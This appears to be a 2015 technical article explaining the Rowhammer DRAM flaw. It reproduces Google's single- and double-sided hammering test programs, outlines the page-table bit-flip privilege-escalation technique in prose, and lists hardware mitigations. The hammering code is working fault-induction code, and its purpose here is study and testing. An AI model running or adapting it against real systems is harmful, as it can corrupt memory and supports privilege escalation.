Table of Contents
1. Rowhammer Introduction
2. Rowhammer Principle
3. Track And Fix
1. Rowhammer Introduction
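To provide more capacity, today's DRAM cells are packed more densely on the chip. This makes it hard to prevent neighboring cells from interacting electrically: after enough accesses to nearby cells, a cell's value can flip from 1 to 0, or the reverse.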
Code example

code1a:
  mov (X), %eax   // Read from address X
  mov (Y), %ebx   // Read from address Y
  clflush (X)     // Flush cache for address X
  clflush (Y)     // Flush cache for address Y
  jmp code1a
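Two factors are needed for this loop to cause bit flips:
1. Address selection: addresses X and Y must map to different rows of the same DRAM bank. Each DRAM chip contains many rows of cells. Accessing a byte in memory involves transferring data from the row into the chip's "row buffer" (discharging the row's cells); after the row buffer has been read or written, its contents are transferred back into the original row (recharging the cells). This "activation" of a row (discharge plus recharge) can disturb adjacent rows. If a row is activated enough times between the automatic refreshes of its neighbors (typically every 64 ms), bits in the adjacent rows can flip.
The row buffer acts as a cache: if X and Y point to the same row, code1a simply reads from the row buffer without any activation. Each DRAM bank has its own "currently activated row", so if X and Y point to different banks, code1a reads from those banks' row buffers without repeatedly activating rows. Only when X and Y point to different rows of the same bank does code1a cause the rows of X and Y to be activated over and over. This is called row hammering.
2. Bypassing the cache: without the CLFLUSH instructions in code1a, the memory reads (mov) would be served from the CPU cache. Flushing the cache with CLFLUSH forces each memory access to go to DRAM, which is what causes the rows to be activated repeatedly.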
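The three address cases above can be made concrete with a toy model. The sketch below is only an illustration under simplifying assumptions: DramAddress, count_activations and the bank/row numbers are hypothetical names and values, and a real memory controller has timing and scheduling behavior that this ignores. Each bank remembers one open row, and an access counts as an activation only when it targets a different row than the one currently open in that bank.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical toy address: the bank and row that an access lands in.
struct DramAddress {
  int bank;
  int row;
};

// Counts row activations for `repeats` passes over `pattern`.
// Each bank keeps exactly one open row in its row buffer; an access to
// the open row is a row-buffer hit and causes no activation.
inline uint64_t count_activations(const std::vector<DramAddress>& pattern,
                                  int repeats, int num_banks) {
  std::vector<int> open_row(num_banks, -1);  // -1 means no row is open yet
  uint64_t activations = 0;
  for (int r = 0; r < repeats; ++r) {
    for (const DramAddress& a : pattern) {
      assert(a.bank >= 0 && a.bank < num_banks);
      if (open_row[a.bank] != a.row) {
        open_row[a.bank] = a.row;  // close the old row, activate the new one
        ++activations;
      }
    }
  }
  return activations;
}
```

With 1000 passes over two addresses, the model gives 1 activation when both addresses share a row, 2 when they sit in different banks, and 2000 when they sit in different rows of the same bank. Only the last pattern keeps activating rows, which is the case code1a relies on.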
New research by Google shows that these types of errors can be introduced in a predictable manner. A proof-of-concept (PoC) exploit that runs on the Linux operating system has been released. Successful exploitation leverages the predictability of these Row Hammer errors to modify memory of an affected device. An authenticated, local attacker with the ability to execute code on the affected system could elevate their privileges to those of the superuser ("root") account, or to those of the kernel itself, which runs in Ring 0. Code that runs in Ring 0 can modify anything on the affected system.
Relevant Link:
http://linux.cn/article-5030-qqmail.html
http://www.ddrdetective.com/row-hammer/
2. Rowhammer Principle
0x1: Dynamic random-access memory (DRAM)
Dynamic random-access memory (DRAM) contains a two-dimensional array of cells.
Each storage cell consists of a capacitor and an access transistor. The two states of a binary value are represented by the capacitor being fully charged or fully discharged.
Memory disturbance errors can occur in cases where there is an abnormal interaction between two circuit components that should be isolated from each other. Historically, these memory disturbance errors have been demonstrated by repeatedly accessing (opening, reading, and closing) the same row of memory. This is discussed in detail in the research paper linked at the end of this section (kim-isca14.pdf).
0x2: Privilege Escalation Experiment
The test leverages row hammering to induce a bit flip in a page table entry (PTE), so that the PTE ends up pointing to a physical page containing a page table of the attacking process. Once the process can write to one of its own page tables, it can map, and therefore read and write, any physical memory.
The research uses memory spraying via mmap(), the POSIX system call that maps files or devices into memory. The attacker can spray most of physical memory with page tables by repeatedly calling mmap() on a single file.
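To see why a single flipped bit in a PTE matters, it helps to look at the arithmetic. The sketch below is only an illustration: it assumes the x86-64 layout for 4 KiB pages, where bits 12 to 51 of a PTE hold the physical frame address and the low 12 bits hold flags. The helper names and the example PTE value are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// x86-64 PTE for a 4 KiB page: bits 12..51 hold the physical frame address.
constexpr uint64_t kPteFrameMask = 0x000FFFFFFFFFF000ULL;

// Returns the physical address of the page that the PTE points to.
inline uint64_t pte_physical_address(uint64_t pte) {
  return pte & kPteFrameMask;
}

// Returns `value` with bit number `bit` inverted, as a disturbance error would.
inline uint64_t flip_bit(uint64_t value, unsigned bit) {
  return value ^ (1ULL << bit);
}
```

For a hypothetical PTE of 0x12345067 (frame 0x12345000, flags 0x67), flipping bit 20 yields a PTE whose frame address is 0x12245000: the flags are unchanged, but the mapping now points at a different physical page. The spraying step is what makes it likely that this other page holds a page table.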
The tests were done with non-ECC memory using the CLFLUSH instruction with a “random address selection” methodology also described in their post.
./make.sh
./rowhammer_test
0x3: Code Analysis
rowhammer_test.cc
#define __STDC_FORMAT_MACROS

#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

const size_t mem_size = 1 << 30;
const int toggles = 540000;

char *g_mem;

char *pick_addr() {
  // Widen before shifting so that the shift cannot overflow a signed int.
  size_t offset = ((size_t) rand() << 12) % mem_size;
  return g_mem + offset;
}

class Timer {
  struct timeval start_time_;

 public:
  Timer() {
    // Note that we use gettimeofday() (with microsecond resolution)
    // rather than clock_gettime() (with nanosecond resolution) so
    // that this works on Mac OS X, because OS X doesn't provide
    // clock_gettime() and we don't really need nanosecond resolution.
    int rc = gettimeofday(&start_time_, NULL);
    assert(rc == 0);
  }

  double get_diff() {
    struct timeval end_time;
    int rc = gettimeofday(&end_time, NULL);
    assert(rc == 0);
    return (end_time.tv_sec - start_time_.tv_sec
            + (double) (end_time.tv_usec - start_time_.tv_usec) / 1e6);
  }

  void print_iters(uint64_t iterations) {
    double total_time = get_diff();
    double iter_time = total_time / iterations;
    printf("  %.3f nanosec per iteration: %g sec for %" PRId64 " iterations\n",
           iter_time * 1e9, total_time, iterations);
  }
};

// Repeatedly read a set of addresses, which activates (discharges and
// recharges) the DRAM rows they live in.
static void toggle(int iterations, int addr_count) {
  Timer t;
  for (int j = 0; j < iterations; j++) {
    uint32_t *addrs[addr_count];
    for (int a = 0; a < addr_count; a++) {
      // Pick random addresses. Some of them will happen to fall in
      // different rows of the same bank; they are not necessarily in
      // adjacent rows.
      addrs[a] = (uint32_t *) pick_addr();
    }

    uint32_t sum = 0;
    // Loop toggles = 540000 times, reading from physical memory.
    for (int i = 0; i < toggles; i++) {
      for (int a = 0; a < addr_count; a++) {
        // Read each of the addr_count addresses.
        sum += *addrs[a] + 1;
      }
      for (int a = 0; a < addr_count; a++) {
        // Flush each address from the CPU cache.
        asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
      }
    }

    // Sanity check.  We don't expect this to fail, because reading
    // these rows refreshes them.
    if (sum != 0) {
      printf("error: sum=%x\n", sum);
      exit(1);
    }
  }
  t.print_iters(iterations * addr_count * toggles);
}

void main_prog() {
  g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE,
                        MAP_ANON | MAP_PRIVATE, -1, 0);
  assert(g_mem != MAP_FAILED);

  printf("clear\n");
  // Fill the region [g_mem, g_mem + mem_size) with the initial value 0xFF.
  memset(g_mem, 0xff, mem_size);

  Timer t;
  int iter = 0;
  // Loop forever: triggering a bit flip usually takes many attempts.
  for (;;) {
    printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff());
    // 10 iterations, each hammering 8 randomly chosen addresses.
    toggle(10, 8);

    Timer check_timer;
    printf("check\n");
    uint64_t *end = (uint64_t *) (g_mem + mem_size);
    uint64_t *ptr;
    int errors = 0;
    for (ptr = (uint64_t *) g_mem; ptr < end; ptr++) {
      uint64_t got = *ptr;
      if (got != ~(uint64_t) 0) {
        printf("error at %p: got 0x%" PRIx64 "\n", ptr, got);
        errors++;
      }
    }
    printf("  (check took %fs)\n", check_timer.get_diff());
    if (errors)
      exit(1);
  }
}

int main() {
  // In case we are running as PID 1, we fork() a subprocess to run
  // the test in.  Otherwise, if process 1 exits or crashes, this will
  // cause a kernel panic (which can cause a reboot or just obscure
  // log output and prevent console scrollback from working).
  int pid = fork();
  if (pid == 0) {
    main_prog();
    _exit(1);
  }

  int status;
  if (waitpid(pid, &status, 0) == pid) {
    printf("** exited with status %i (0x%x)\n", status, status);
  }

  for (;;) {
    sleep(999);
  }
  return 0;
}
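The check loop in main_prog() only prints each 64-bit word that no longer equals the fill pattern. When analyzing results it is often more useful to know exactly which bits changed. The following is a minimal sketch of that idea, not part of rowhammer_test.cc: FlipReport, popcount64, find_flips and total_flipped_bits are hypothetical helper names. XOR-ing the observed word with the expected pattern leaves a 1 in every flipped bit position.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// One corrupted word: its index and a mask with a 1 for every flipped bit.
struct FlipReport {
  size_t word_index;
  uint64_t flipped_mask;
};

// Counts set bits by clearing the lowest set bit until none remain.
inline int popcount64(uint64_t x) {
  int n = 0;
  while (x != 0) {
    x &= x - 1;
    ++n;
  }
  return n;
}

// Scans `count` words and reports every word that differs from `expected`.
inline std::vector<FlipReport> find_flips(const uint64_t* words, size_t count,
                                          uint64_t expected) {
  std::vector<FlipReport> reports;
  for (size_t i = 0; i < count; ++i) {
    uint64_t diff = words[i] ^ expected;  // 1 bits mark flipped positions
    if (diff != 0) {
      reports.push_back(FlipReport{i, diff});
    }
  }
  return reports;
}

// Sums the number of flipped bits over all reports.
inline int total_flipped_bits(const std::vector<FlipReport>& reports) {
  int total = 0;
  for (const FlipReport& r : reports) {
    total += popcount64(r.flipped_mask);
  }
  return total;
}
```

Called as find_flips((uint64_t *) g_mem, mem_size / 8, ~(uint64_t) 0), this would return one entry per damaged word. Since the test fills memory with 0xFF, only 1-to-0 flips are visible; a second pass with an all-zero fill would be needed to catch 0-to-1 flips.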
double_sided_rowhammer.cc
// Small test program to systematically check through the memory to find bit
// flips by double-sided row hammering.
//
// Compilation instructions:
//   g++ -std=c++11 [filename]
//
// ./double_sided_rowhammer [-t nsecs] [-p percentage]
//
// Hammers for nsecs seconds, acquires the described fraction of memory (0.0
// to 0.9 or so).

#include <asm/unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <linux/kernel-page-flags.h>
#include <map>
#include <signal.h>  // signal(), SIGALRM
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/sysinfo.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <vector>

// The fraction of physical memory that should be mapped for testing.
double fraction_of_physical_memory = 0.3;

// The time to hammer before aborting. Defaults to one hour.
uint64_t number_of_seconds_to_hammer = 3600;

// The number of memory reads to try.
uint64_t number_of_reads = 1000*1024;

// Obtain the size of the physical memory of the system.
uint64_t GetPhysicalMemorySize() {
  struct sysinfo info;
  sysinfo( &info );
  return (size_t)info.totalram * (size_t)info.mem_unit;
}

// If physical_address is in the range, put (physical_address, virtual_address)
// into the map.
bool PutPointerIfInAddressRange(const std::pair<uint64_t, uint64_t>& range,
    uint64_t physical_address, uint8_t* virtual_address,
    std::map<uint64_t, uint8_t*>& pointers) {
  if (physical_address >= range.first && physical_address <= range.second) {
    printf("[!] Found desired physical address %lx at virtual %lx\n",
        (uint64_t)physical_address, (uint64_t)virtual_address);
    pointers[physical_address] = virtual_address;
    return true;
  }
  return false;
}

bool IsRangeInMap(const std::pair<uint64_t, uint64_t>& range,
    const std::map<uint64_t, uint8_t*>& mapping) {
  for (uint64_t check = range.first; check <= range.second; check += 0x1000) {
    if (mapping.find(check) == mapping.end()) {
      printf("[!] Failed to find physical memory at %lx\n", check);
      return false;
    }
  }
  return true;
}

uint64_t GetPageFrameNumber(int pagemap, uint8_t* virtual_address) {
  // Read the entry in the pagemap.
  uint64_t value;
  int got = pread(pagemap, &value, 8,
                  (reinterpret_cast<uintptr_t>(virtual_address) / 0x1000) * 8);
  assert(got == 8);
  uint64_t page_frame_number = value & ((1ULL << 54)-1);
  return page_frame_number;
}

void SetupMapping(uint64_t* mapping_size, void** mapping) {
  *mapping_size =
    static_cast<uint64_t>((static_cast<double>(GetPhysicalMemorySize()) *
          fraction_of_physical_memory));

  *mapping = mmap(NULL, *mapping_size, PROT_READ | PROT_WRITE,
      MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  assert(*mapping != (void*)-1);

  // Initialize the mapping so that the pages are non-empty.
  printf("[!] Initializing large memory mapping ...");
  for (uint64_t index = 0; index < *mapping_size; index += 0x1000) {
    uint64_t* temporary = reinterpret_cast<uint64_t*>(
        static_cast<uint8_t*>(*mapping) + index);
    temporary[0] = index;
  }
  printf("done\n");
}

// Build a memory mapping that is big enough to cover all of physical memory.
bool GetMappingsForPhysicalRanges(
    const std::pair<uint64_t, uint64_t>& physical_range_A_to_hammer,
    std::map<uint64_t, uint8_t*>& pointers_to_hammer_A,
    const std::pair<uint64_t, uint64_t>& physical_range_B_to_hammer,
    std::map<uint64_t, uint8_t*>& pointers_to_hammer_B,
    const std::pair<uint64_t, uint64_t>& physical_range_to_check,
    std::map<uint64_t, uint8_t*>& pointers_to_range_to_check,
    void** out_mapping) {

  uint64_t mapping_size;
  void* mapping;
  SetupMapping(&mapping_size, &mapping);

  int pagemap = open("/proc/self/pagemap", O_RDONLY);
  assert(pagemap >= 0);

  // Don't assert if opening this fails, the code needs to run under usermode.
  int kpageflags = open("/proc/kpageflags", O_RDONLY);

  // Iterate over the entire mapping, identifying the physical addresses for
  // each 4k-page.
  for (uint64_t offset = 0; offset < mapping_size; offset += 0x1000) {
    uint8_t* virtual_address = static_cast<uint8_t*>(mapping) + offset;
    uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address);
    // Read the flags for this page if we have access to kpageflags.
    uint64_t page_flags = 0;
    if (kpageflags >= 0) {
      int got = pread(kpageflags, &page_flags, 8, page_frame_number * 8);
      assert(got == 8);
    }

    uint64_t physical_address;
    if (page_flags & KPF_HUGE) {
      printf("[!] %lx is on huge page\n", (uint64_t)virtual_address);
      physical_address = (page_frame_number * 0x1000) +
       (reinterpret_cast<uintptr_t>(virtual_address) & (0x200000-1));
    } else {
      physical_address = (page_frame_number * 0x1000) +
       (reinterpret_cast<uintptr_t>(virtual_address) & 0xFFF);
    }

    //printf("[!] %lx is %lx\n", (uint64_t)virtual_address,
    //    (uint64_t)physical_address);
    PutPointerIfInAddressRange(physical_range_A_to_hammer, physical_address,
        virtual_address, pointers_to_hammer_A);
    PutPointerIfInAddressRange(physical_range_B_to_hammer, physical_address,
        virtual_address, pointers_to_hammer_B);
    PutPointerIfInAddressRange(physical_range_to_check, physical_address,
        virtual_address, pointers_to_range_to_check);
  }
  // Check if all physical addresses the caller asked for are in the resulting
  // map.
  if (IsRangeInMap(physical_range_A_to_hammer, pointers_to_hammer_A)
      && IsRangeInMap(physical_range_B_to_hammer, pointers_to_hammer_B)
      && IsRangeInMap(physical_range_to_check, pointers_to_range_to_check)) {
    return true;
  }
  return false;
}

uint64_t HammerAddressesStandard(
    const std::pair<uint64_t, uint64_t>& first_range,
    const std::pair<uint64_t, uint64_t>& second_range,
    uint64_t number_of_reads) {
  volatile uint64_t* first_pointer =
      reinterpret_cast<uint64_t*>(first_range.first);
  volatile uint64_t* second_pointer =
      reinterpret_cast<uint64_t*>(second_range.first);
  uint64_t sum = 0;

  while (number_of_reads-- > 0) {
    sum += first_pointer[0];
    sum += second_pointer[0];
    asm volatile(
        "clflush (%0);\n\t"
        "clflush (%1);\n\t"
        : : "r" (first_pointer), "r" (second_pointer) : "memory");
  }
  return sum;
}

typedef uint64_t(HammerFunction)(
    const std::pair<uint64_t, uint64_t>& first_range,
    const std::pair<uint64_t, uint64_t>& second_range,
    uint64_t number_of_reads);

// A comprehensive test that attempts to hammer adjacent rows for a given
// assumed row size (and assumptions of sequential physical addresses for
// various rows).
uint64_t HammerAllReachablePages(uint64_t presumed_row_size,
    void* memory_mapping, uint64_t memory_mapping_size, HammerFunction* hammer,
    uint64_t number_of_reads) {
  // This vector will be filled with all the pages we can get access to for a
  // given row size.
  std::vector<std::vector<uint8_t*>> pages_per_row;
  uint64_t total_bitflips = 0;

  pages_per_row.resize(memory_mapping_size / presumed_row_size);
  int pagemap = open("/proc/self/pagemap", O_RDONLY);
  assert(pagemap >= 0);

  printf("[!] Identifying rows for accessible pages ... ");
  for (uint64_t offset = 0; offset < memory_mapping_size; offset += 0x1000) {
    uint8_t* virtual_address = static_cast<uint8_t*>(memory_mapping) + offset;
    uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address);
    uint64_t physical_address = page_frame_number * 0x1000;
    uint64_t presumed_row_index = physical_address / presumed_row_size;
    //printf("[!] put va %lx pa %lx into row %ld\n", (uint64_t)virtual_address,
    //    physical_address, presumed_row_index);
    // Grow the vector so that presumed_row_index is a valid index. The
    // listing as published compared with ">" and resized to
    // presumed_row_index, which leaves the index one past the end.
    if (presumed_row_index >= pages_per_row.size()) {
      pages_per_row.resize(presumed_row_index + 1);
    }
    pages_per_row[presumed_row_index].push_back(virtual_address);
    //printf("[!] done\n");
  }
  printf("Done\n");

  // We should have some pages for most rows now.
  for (uint64_t row_index = 0; row_index + 2 < pages_per_row.size();
      ++row_index) {
    if ((pages_per_row[row_index].size() != 64) ||
        (pages_per_row[row_index+2].size() != 64)) {
      printf("[!] Can't hammer row %ld - only got %ld/%ld pages "
          "in the rows above/below\n",
          row_index+1, pages_per_row[row_index].size(),
          pages_per_row[row_index+2].size());
      continue;
    } else if (pages_per_row[row_index+1].size() == 0) {
      printf("[!] Can't hammer row %ld, got no pages from that row\n",
          row_index+1);
      continue;
    }
    printf("[!] Hammering rows %ld/%ld/%ld of %ld (got %ld/%ld/%ld pages)\n",
        row_index, row_index+1, row_index+2, pages_per_row.size(),
        pages_per_row[row_index].size(), pages_per_row[row_index+1].size(),
        pages_per_row[row_index+2].size());
    // Iterate over all pages we have for the first row.
    for (uint8_t* first_row_page : pages_per_row[row_index]) {
      // Iterate over all pages we have for the second row.
      for (uint8_t* second_row_page : pages_per_row[row_index+2]) {
        // Set all the target pages to 0xFF.
        for (uint8_t* target_page : pages_per_row[row_index+1]) {
          memset(target_page, 0xFF, 0x1000);
        }
        // Now hammer the two pages we care about.
        std::pair<uint64_t, uint64_t> first_page_range(
            reinterpret_cast<uint64_t>(first_row_page),
            reinterpret_cast<uint64_t>(first_row_page+0x1000));
        std::pair<uint64_t, uint64_t> second_page_range(
            reinterpret_cast<uint64_t>(second_row_page),
            reinterpret_cast<uint64_t>(second_row_page+0x1000));
        hammer(first_page_range, second_page_range, number_of_reads);
        // Now check the target pages.
        uint64_t number_of_bitflips_in_target = 0;
        for (const uint8_t* target_page : pages_per_row[row_index+1]) {
          for (uint32_t index = 0; index < 0x1000; ++index) {
            if (target_page[index] != 0xFF) {
              ++number_of_bitflips_in_target;
            }
          }
        }
        if (number_of_bitflips_in_target > 0) {
          printf("[!] Found %ld flips in row %ld (%lx to %lx) when hammering "
              "%lx and %lx\n", number_of_bitflips_in_target, row_index+1,
              ((row_index+1)*presumed_row_size),
              ((row_index+2)*presumed_row_size)-1,
              GetPageFrameNumber(pagemap, first_row_page)*0x1000,
              GetPageFrameNumber(pagemap, second_row_page)*0x1000);
          total_bitflips += number_of_bitflips_in_target;
        }
      }
    }
  }
  return total_bitflips;
}

// Hammer all reachable rows of physical memory.
void HammerAllReachableRows(HammerFunction* hammer, uint64_t number_of_reads) {
  uint64_t mapping_size;
  void* mapping;
  SetupMapping(&mapping_size, &mapping);

  HammerAllReachablePages(1024*256, mapping, mapping_size,
                          hammer, number_of_reads);
}

void HammeredEnough(int sig) {
  printf("[!] Spent %ld seconds hammering, exiting now.\n",
      number_of_seconds_to_hammer);
  fflush(stdout);
  fflush(stderr);
  exit(0);
}

int main(int argc, char** argv) {
  // Turn off stdout buffering when it is a pipe.
  setvbuf(stdout, NULL, _IONBF, 0);

  int opt;
  while ((opt = getopt(argc, argv, "t:p:")) != -1) {
    switch (opt) {
      case 't':
        number_of_seconds_to_hammer = atoi(optarg);
        break;
      case 'p':
        fraction_of_physical_memory = atof(optarg);
        break;
      default:
        fprintf(stderr, "Usage: %s [-t nsecs] [-p percent]\n",
            argv[0]);
        exit(EXIT_FAILURE);
    }
  }

  signal(SIGALRM, HammeredEnough);

  printf("[!] Starting the testing process...\n");
  alarm(number_of_seconds_to_hammer);
  HammerAllReachableRows(&HammerAddressesStandard, number_of_reads);
}
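The double-sided test rests on two small pieces of arithmetic: decoding a /proc/self/pagemap entry into a page frame number, and turning a physical address into a presumed row index so that the rows directly above and below a victim row can be hammered. The sketch below isolates that arithmetic. The helper names are hypothetical. The 256 KiB presumed row size is the value passed by HammerAllReachableRows() and is itself an assumption about how physical addresses map to DRAM rows. Note that the Linux pagemap documentation describes bits 0 to 54 as the PFN and bit 63 as the "present" flag, so this sketch masks 55 bits, whereas the listing masks 54.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kPageSize = 0x1000;             // 4 KiB pages
constexpr uint64_t kPresumedRowSize = 256 * 1024;  // assumed, as in the listing

// Bit 63 of a pagemap entry is set when the page is present in RAM.
inline bool pagemap_present(uint64_t entry) {
  return (entry >> 63) != 0;
}

// Bits 0..54 of a pagemap entry hold the page frame number (if present).
inline uint64_t pagemap_pfn(uint64_t entry) {
  return entry & ((1ULL << 55) - 1);
}

// Maps a physical address to a row index under the presumed row size.
inline uint64_t presumed_row_index(uint64_t physical_address) {
  return physical_address / kPresumedRowSize;
}

// The two rows to hammer around a victim row.
struct AggressorRows {
  uint64_t above;
  uint64_t below;
};

// Returns the neighbors of `victim_row`; the caller must pass a row >= 1.
inline AggressorRows aggressors_for(uint64_t victim_row) {
  return {victim_row - 1, victim_row + 1};
}
```

For a hypothetical entry with the present bit set and a PFN of 0x12345, the physical address is 0x12345000, which falls in presumed row 1165; the rows to hammer are then 1164 and 1166. On newer Linux kernels the PFN field is reported as zero to processes without CAP_SYS_ADMIN, so this approach needs elevated privileges there.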
Relevant Link:
http://en.wikipedia.org/wiki/Dynamic_random-access_memory
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
https://github.com/google/rowhammer-test
http://en.wikipedia.org/wiki/Row_hammer
3. Track And Fix
This vulnerability exists within hardware and cannot be mitigated by just upgrading software. The following are the widely known mitigations for the Row Hammer issue:
1. Two times (2x) refresh: a mitigation that has been commonly implemented on Intel server chipsets since the introduction of Sandy Bridge, and is the suggested default. It reduces the row refresh interval used by the memory controller from 64 ms to 32 ms, which shrinks the window in which a row hammer, or other gate pass type memory error, can be introduced.
2. Pseudo Target Row Refresh (pTRR): available in modern memory and chipsets. pTRR does not introduce any performance or power impact.
3. Increased Patrol Scrub timers: systems equipped with ECC memory often have a BIOS option that lets the administrator set the interval at which the CPU uses the checksum data stored on each ECC DIMM to verify that the contents of memory are valid, correcting any bit errors that may have been introduced. The number of correctable errors varies with architecture and ECC variant. Administrators may consider reducing the patrol scrub timer from the standard 20 minute interval to a lower value.
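The effect of 2x refresh can be estimated with simple arithmetic: the number of times an attacker can activate a row before its neighbors are refreshed is bounded by the refresh window divided by the time one activation takes. The sketch below is a rough upper bound only. max_activations is a hypothetical helper, and the 50 ns activation interval used in the example is an assumed round number, not a figure from the sources above.

```cpp
#include <cassert>
#include <cstdint>

// Upper bound on how many activations fit into one refresh window,
// assuming one activation every `row_cycle_ns` nanoseconds.
inline uint64_t max_activations(uint64_t refresh_window_ms,
                                uint64_t row_cycle_ns) {
  const uint64_t window_ns = refresh_window_ms * 1000000ULL;  // ms -> ns
  return window_ns / row_cycle_ns;
}
```

Under the assumed 50 ns interval, a 64 ms window allows at most 1,280,000 activations and a 32 ms window at most 640,000. Halving the refresh interval halves the attacker's budget, which helps only if the number of activations needed to flip a bit on a given module lies above the reduced bound.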
Relevant Link:
http://www.ddrdetective.com/files/3314/1036/5702/Description_of_the_Row_Hammer_feature_on_the_FS2800_DDR_Detective.pdf
http://blogs.cisco.com/security/mitigations-available-for-the-dram-row-hammer-vulnerability
Copyright (c) 2015 LittleHann All rights reserved